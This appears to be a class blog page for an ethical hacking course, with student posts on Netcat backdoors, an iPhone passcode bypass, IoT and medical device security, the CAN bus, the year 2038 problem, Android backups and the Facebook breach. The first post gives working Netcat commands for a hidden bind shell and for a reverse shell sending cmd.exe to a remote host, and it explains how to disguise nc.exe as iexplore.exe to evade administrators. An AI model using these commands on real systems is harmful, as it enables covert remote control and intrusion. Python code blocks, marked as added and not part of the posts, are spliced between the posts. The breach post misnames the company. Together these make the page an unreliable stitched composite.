
ITACS 5211: Introduction to Ethical Hacking

Wade Mackey

Week 07: NetCat and HellCat

How can a hacker hide from a system admin and still run a backdoor

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

I had this piece of information, which I came across when the professor was teaching the NetCat class. I don’t have the whole article. Here is a piece that explains how a hacker can run a backdoor and also hide it from a not so smart network or system admin. It is technical. If you are interested in this type of information, read on.

Netcat Backdoor

Victim: nc -L -d -p <port> -t -e cmd.exe

-L is the listening command. -d tells netcat not to open a window when running. -p assigns a port. -t is for telnet. -e activates cmd.exe when a client connects to it.

Client: nc -v <ip address of victim>

Note: In this example netcat runs in the background on the victim's machine. A system admin may open Task Manager and see that nc.exe is running. A smart hacker would rename nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspicion. Now, if a system administrator runs a trusted netstat -a -n command at the DOS prompt, he or she might notice that something is running on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons and netstat output can be time consuming to parse, especially on systems with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat -a -n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:

nc -l -p 80

From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:

mkdir C:\Windows\System32\Drivers\q
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>
Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there’s no way of restarting it on the Windows side.
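As an added, defender-side example that is not part of the post or of the excerpt it quotes: a Python check over constructed "netstat -a -n -o" output and a constructed PID-to-image-path table (the kind of mapping Task Manager or a process listing gives you) that flags the artifacts the excerpt describes: an .exe living under System32\Drivers, a browser-named process running from a non-standard directory, and a listener started from a user-writable location. The sample lines, paths and rule lists are assumptions made for the example.

```python
from pathlib import PureWindowsPath

# Constructed sample of `netstat -a -n -o` output (columns: proto, local, remote, state, PID).
NETSTAT_SAMPLE = """
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    192.168.1.20:49700     203.0.113.9:80         ESTABLISHED     4512
  TCP    192.168.1.20:49701     203.0.113.9:80         ESTABLISHED     3060
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2208
"""

# Constructed PID -> executable path table (hypothetical processes).
PROCESS_PATHS = {
    812: r"C:\Windows\System32\svchost.exe",
    4512: r"C:\Program Files\Internet Explorer\iexplore.exe",
    3060: r"C:\Windows\System32\Drivers\q\iexplore.exe",   # renamed nc.exe from the excerpt
    2208: r"C:\Users\Public\updatemanager.exe",            # listener with an innocent name
}

# Where a genuine copy of each browser binary is expected to live (assumption).
BROWSER_DIRS = {"iexplore.exe": r"c:\program files\internet explorer"}
# Directories an unprivileged user can write to (assumption, lowercase prefixes).
WRITABLE_ROOTS = ("c:\\users\\", "c:\\windows\\temp\\")


def parse_netstat(text):
    """Turn TCP rows of `netstat -a -n -o` into dicts; UDP rows have no state column and are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            proto, local, remote, state, pid = parts
            rows.append({"proto": proto, "local": local, "remote": remote,
                         "state": state, "pid": int(pid)})
    return rows


def find_suspicious(conns, procs):
    """Return (pid, reason) pairs for connections owned by oddly placed executables."""
    findings = []
    for c in conns:
        path = procs.get(c["pid"])
        if path is None:
            continue
        p = PureWindowsPath(path)
        name, parent = p.name.lower(), str(p.parent).lower()
        if "\\system32\\drivers" in parent and name.endswith(".exe"):
            findings.append((c["pid"], f"executable under Drivers (should hold .sys only): {path}"))
        if name in BROWSER_DIRS and parent != BROWSER_DIRS[name]:
            findings.append((c["pid"], f"{name} running from an unexpected directory: {path}"))
        if c["state"] == "LISTENING" and path.lower().startswith(WRITABLE_ROOTS):
            findings.append((c["pid"], f"listener on {c['local']} from a user-writable path: {path}"))
    return findings
```

The renamed copy in Drivers\q is caught by its path even though its name and its port-80 connection look like a normal browser session.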

New iPhone Bug Gives Anyone Access to Your Private Photos

October 17, 2018 by Ruby(Qianru) Yang 1 Comment

Be careful about what pictures you take!

A security enthusiast who discovered a passcode bypass vulnerability in Apple’s iOS 12 late last month has now dropped another passcode bypass bug that works on the latest iOS 12.0.1 that was released last week.
Jose Rodriguez, a Spanish amateur security researcher, discovered a bug in iOS 12 in late September that allows attackers with physical access to your iPhone to access your contacts and photos.
The bug was patched in iOS 12.0.1, but he has now discovered a similar iPhone passcode bypass hack that works in 12.0.1 and is easier to execute than the bug Rodriguez discovered and reported two weeks ago.
The new hack allows anyone with physical access to your locked iPhone to access your photo album, select photos and send them to anyone using Apple Messages.

https://thehackernews.com/2018/10/iphone-lock-passcode-bypass.html

UK seeks to secure smart home gadgets

October 17, 2018 by Connor Fairman Leave a Comment

This is a post related to the one I put up about the FDA hiring ethical hackers to assess the vulnerabilities of medical devices. Smart home gadgets are in many ways similar to medical devices because they often feature embedded systems, which are fundamental in IoT devices. These are systems that need to be fast and efficient in their memory management. These devices tend to use lower level languages, such as C or even Assembly, which are highly prone to segfaults, memory leaks, and other issues that high level languages abstract away. These vulnerabilities can be attacked by hackers without too much difficulty because little things will cause entire programs to crash and burn. Therefore, I think it’s a good thing that the UK is creating some guidelines for securing home gadgets.

https://www.bbc.com/news/technology-45863948?intlink_from_url=https://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security&link_location=live-reporting-story

Chronicle: A Meteor Aimed At Planet Threat Intel?

October 17, 2018 by Manogna Alahari 1 Comment

https://krebsonsecurity.com/2018/01/chronicle-a-meteor-aimed-at-planet-threat-intel

This article discusses the factors on which companies rely when choosing security software and the factors that IT staff generally miss. The article also talks about the challenges faced by a new company entering the cyber security or anti-virus market, and how such a company, for example Chronicle (a malware intelligence service acquired by Google), should differentiate itself from the tools already available on the market.

https://medium.com/chronicle-blog/give-good-the-advantage-75ab2c242e45

The company's CEO, Stephen Gillett, mentions that they would include new features such as machine learning, artificial intelligence, and massive data analytics and storage capabilities, which will hopefully help these organizations reach present standards.

The Cybersecurity 202: The FDA is embracing ethical hackers in its push to secure medical devices

October 17, 2018 by Connor Fairman 1 Comment

Apparently attacks against medical devices are on the rise and the FDA is turning to ethical hackers. This is something I’ve thought about before. I don’t know much about medical devices, but I’ve always wondered what would happen if a hacker could somehow force a new pacemaker to segfault or something along those lines. This should be a very good measure to take in the FDA approval process because it will hold developers of these medical devices to a higher security standard. Although, I welcome input from anyone in the medical device field who has some experience in this area.

https://www.washingtonpost.com/news/powerpost/paloma/the-cybersecurity-202/2018/10/17/the-cybersecurity-202-the-fda-is-embracing-ethical-hackers-in-its-push-to-secure-medical-devices/5bc6156b1b326b7c8a8d1a01/?utm_term=.8f2d100fa6fb

CLEVER TOOL SHIELDS YOUR CAR FROM HACKS BY WATCHING ITS INTERNAL CLOCKS

October 17, 2018 by Raaghav Sharma 2 Comments

In a paper they plan to present at the Usenix security conference next month, University of Michigan researchers Kyong-Tak Cho and Kang Shin describe an easy-to-assemble tool they call the Clock-based Intrusion Detection System, or CIDS. It’s designed to spot the malicious messages car hackers use to take control of vehicle components like brakes and transmission. The CIDS prototype uses a new technique to spot attack messages: It records the communications on a car’s internal network known as a CAN bus and—in just seconds—creates “fingerprints” for every digital component of a vehicle, the so-called Electronic Control Units or ECUs that allow everything from brakes to windshield wipers to communicate.

To perform that fingerprinting, they use a weird characteristic of all computers: tiny timing errors known as “clock skew.” Taking advantage of the fact that those errors are different in every computer—including every computer inside a car—the researchers were able to assign a fingerprint to each ECU based on its specific clock skew. The CIDS’ device then uses those fingerprints to differentiate between the ECUs, and to spot when one ECU impersonates another, like when a hacker corrupts the vehicle’s radio system to spoof messages that are meant to come from a brake pedal or steering system.

That sort of impersonation is key to how white hat hackers previously managed to remotely mess with vehicles’ brakes, transmission and steering systems.


https://www.wired.com/2016/07/clever-tool-shields-car-hacks-watching-internal-clocks/
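The clock-skew fingerprinting described above, as an added example that is not part of the post or of the researchers' CIDS code: each periodic CAN message ID is expected to arrive every PERIOD seconds, the arrival offset from that schedule drifts linearly at the transmitter's clock skew, and the least-squares slope of that offset is the ECU's fingerprint. A message stream whose skew does not match the fingerprint stored for its ID is flagged as coming from a different ECU. Arrival timestamps are constructed with a deterministic jitter model; the 10 ms period, 5 ppm tolerance and plain linear fit (the paper uses recursive least squares and CUSUM) are simplifying assumptions.

```python
import random

PERIOD = 0.010  # nominal period of the message in seconds (assumed 10 ms)


def simulate_arrivals(skew_ppm, n, jitter_s, seed):
    """Constructed receive timestamps from a transmitter whose clock runs skew_ppm
    off nominal, with Gaussian receive jitter (deterministic via seed)."""
    rng = random.Random(seed)
    scale = 1.0 + skew_ppm * 1e-6
    return [i * PERIOD * scale + rng.gauss(0.0, jitter_s) for i in range(n)]


def estimate_skew_ppm(arrivals):
    """Offset of message i is arrival_i - (arrival_0 + i * PERIOD). It grows
    linearly with nominal elapsed time; the least-squares slope is the
    transmitter's clock skew relative to the receiver, returned in ppm."""
    n = len(arrivals)
    xs = [i * PERIOD for i in range(n)]
    ys = [arrivals[i] - arrivals[0] - xs[i] for i in range(n)]
    mx, my = sum(xs) / n, sum(ys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    return (sxy / sxx) * 1e6


def fingerprint(arrivals_by_id):
    """Learn one skew fingerprint per CAN ID from a clean capture."""
    return {cid: estimate_skew_ppm(a) for cid, a in arrivals_by_id.items()}


def detect_impersonation(fingerprints, observed_id, arrivals, tolerance_ppm=5.0):
    """Return (flagged, measured_skew): flagged when the stream's skew deviates
    from the fingerprint of the ID it claims by more than the tolerance."""
    measured = estimate_skew_ppm(arrivals)
    return abs(measured - fingerprints[observed_id]) > tolerance_ppm, measured


if __name__ == "__main__":
    # Constructed: brake ECU at +20 ppm sends ID 0x1A0; a compromised radio ECU
    # at -35 ppm later injects messages carrying the same ID.
    fp = fingerprint({"0x1A0": simulate_arrivals(20.0, 1000, 20e-6, seed=1)})
    for label, skew, seed in (("genuine", 20.0, 2), ("spoofed", -35.0, 3)):
        flagged, seen = detect_impersonation(fp, "0x1A0", simulate_arrivals(skew, 1000, 20e-6, seed))
        print(f"{label}: measured {seen:.1f} ppm, fingerprint {fp['0x1A0']:.1f} ppm, flagged={flagged}")
```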

Set your Clocks to 2038 (no, don’t…read this 1st)

October 17, 2018 by Steve Pote 1 Comment

I will admit to new ~reuse~ on this from another class…

…but this is a different audience.

This may look like dry sysadmin stuff, and a very small paragraph mentioning the _kernel_timespec…but this is roughly the Unix version of Y2K where 32-bit systems have been counting seconds since January 1970…and time is running out.

Realistically (and for those of us who may be retired in 2038), setting a timeout into the future on a machine that is vulnerable in this way would cause a buffer overflow. I heard they are bad. And cause interesting, sometimes exploitable side effects…

…since I first read this, any time a system or update has innocently offered me a date range ~20 years or so into the future~, I have weighed breaking something I like or need vs. Roger Rabbit suggesting it might be funny. Not a hard experiment for a VM…

https://www.linux.com/news/2018/8/linux-kernel-418-keeps-things-solid-and-secure

https://en.wikipedia.org/wiki/Year_2038_problem
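As an added example, not part of the post: a Python model of what a signed 32-bit time_t does with a timeout set ~20 years past this post's date. The expiry is computed both as a true integer and as the value a legacy 32-bit field would hold, so the wraparound (and the 1902 date it lands on) is visible. The starting timestamp is a constructed value for 2018-10-17 00:00 UTC.

```python
from datetime import datetime, timedelta, timezone

INT32_MAX = 2**31 - 1  # 2038-01-19 03:14:07 UTC, the last second a signed 32-bit time_t can hold
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def to_int32(value: int) -> int:
    """Reduce an integer to the signed 32-bit value a legacy time_t field would store."""
    return ((value + 2**31) % 2**32) - 2**31


def schedule_timeout(now: int, timeout_seconds: int):
    """Compute an expiry as 64-bit and 32-bit code would.
    Returns (wrapped, expiry_as_32bit_datetime, true_expiry_datetime)."""
    true_expiry = now + timeout_seconds
    legacy = to_int32(true_expiry)
    return (legacy != true_expiry,
            EPOCH + timedelta(seconds=legacy),
            EPOCH + timedelta(seconds=true_expiry))


if __name__ == "__main__":
    now = 1539734400  # constructed: 2018-10-17 00:00:00 UTC (this post's date)
    for years in (10, 20):
        wrapped, legacy, real = schedule_timeout(now, years * 365 * 86400)
        status = "WRAPS to" if wrapped else "fits, expires"
        print(f"+{years} years: 32-bit field {status} {legacy.date()} (true expiry {real.date()})")
```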

Why 802.11ax is the next big thing in Wi-Fi

October 17, 2018 by Haitao Huang 2 Comments

IEEE 802.11ax or Wi-Fi 6 builds on the strengths of 802.11ac, while adding flexibility and scalability that lets new and existing networks power next-generation applications. IEEE 802.11ax OFDMA technology lets even first-wave 802.11ax access points support eight spatial streams and deliver up to 4800 Mbps at the physical layer, depending on vendor implementation. All clients will achieve higher effective throughput at the MAC layer, for a better overall user experience.

https://www.networkworld.com/article/3215907/mobile-wireless/why-80211ax-is-the-next-big-thing-in-wi-fi.html

Google to Encrypt Android Cloud Backups With Your Lock Screen Password

October 17, 2018 by Nishit Darade 1 Comment

Google to Encrypt Android Cloud Backups With Your Lock Screen Password

– Swati Khandelwal

In an effort to secure users’ data while maintaining privacy, Google has announced a new security measure for Android Backup Service that now encrypts all your backup data stored on its cloud servers in a way that even the company can’t read it.

Starting with Android Pie, Google is going to encrypt your Android device backup data in the following way:

Step 1: Your Android device will generate a random secret key (not known to Google).

Step 2: The secret key will then get encrypted using your lock screen PIN/pattern/passcode (not known to Google).

Step 3: This passcode-protected secret key will then be securely sent to a Titan security chip on Google’s servers.

Reference: https://thehackernews.com/2018/10/android-cloud-backup.html
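The three steps above as an added, stdlib-only model that is not part of the post and is not Google's implementation: the device makes a random backup key, wraps it under a key derived from the lock-screen PIN, and hands the wrapped blob to a server-side vault that only unwraps it after checking the PIN and locks out after repeated failures (the attempt limit is the property the Titan chip is assumed to provide here). The XOR-with-PBKDF2-pad plus HMAC wrapping, the iteration count and the attempt limit are assumptions for the example; a production design would use an authenticated cipher.

```python
import hashlib
import hmac
import os

KDF_ITERS = 100_000  # PBKDF2 work factor (assumed value for the example)


def _pad(pin: str, salt: bytes) -> bytes:
    """Derive 64 bytes from the PIN: 32 for the XOR pad, 32 for the HMAC key."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, KDF_ITERS, dklen=64)


def wrap_backup_key(backup_key: bytes, pin: str, salt: bytes) -> bytes:
    """Steps 1 and 2: the device's random 32-byte key is wrapped under the PIN-derived key.
    Blob layout: 16-byte salt || 32-byte encrypted key || 32-byte HMAC tag."""
    assert len(backup_key) == 32 and len(salt) == 16
    pad = _pad(pin, salt)
    enc = bytes(a ^ b for a, b in zip(backup_key, pad[:32]))
    tag = hmac.new(pad[32:], salt + enc, "sha256").digest()
    return salt + enc + tag


class TitanLikeVault:
    """Step 3 stand-in: holds the wrapped key, unwraps only on a correct PIN, and
    refuses further attempts after max_attempts failures, so the low-entropy
    PIN cannot be guessed offline against the blob."""

    def __init__(self, blob: bytes, max_attempts: int = 10):
        self.blob, self.failures, self.max_attempts = blob, 0, max_attempts

    def unwrap(self, pin: str):
        if self.failures >= self.max_attempts:
            raise PermissionError("vault locked after too many failed attempts")
        salt, enc, tag = self.blob[:16], self.blob[16:48], self.blob[48:]
        pad = _pad(pin, salt)
        expected = hmac.new(pad[32:], salt + enc, "sha256").digest()
        if not hmac.compare_digest(expected, tag):
            self.failures += 1
            return None
        self.failures = 0
        return bytes(a ^ b for a, b in zip(enc, pad[:32]))


if __name__ == "__main__":
    key = os.urandom(32)                      # Step 1: device-generated, never sent in the clear
    blob = wrap_backup_key(key, "1234", os.urandom(16))
    vault = TitanLikeVault(blob, max_attempts=3)
    print("wrong PIN ->", vault.unwrap("0000"))
    print("right PIN recovers key:", vault.unwrap("1234") == key)
```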

Updates on the Recent Facebook Security Breach

October 17, 2018 by Haitao Huang 2 Comments

30 Million Facebook Accounts Were Hacked: Check If You’re One of Them

Google initially estimated that the number of customers affected by the access token breach could have been 50 million; the company then downgraded the number to 30 million after the investigation.

  • For about 15 million Facebook users, attackers accessed two sets of information: usernames and contact information including phone numbers, email addresses and other contact information depending on what users had on their profiles.
  • For about 14 million Facebook users, attackers accessed an even wider part of their personal data, including the same two sets of information mentioned above, along with other details users had on their profiles, like gender, language, relationship status, religion, hometown, current city, birthdate, device types used to access Facebook, education, work, the last 10 places they checked into or were tagged in, website, people or pages they follow, and the 15 most recent searches.
  • A remaining 1 million Facebook users did not have any personal data accessed by the attackers.


https://thehackernews.com/2018/10/hack-facebook-account.html

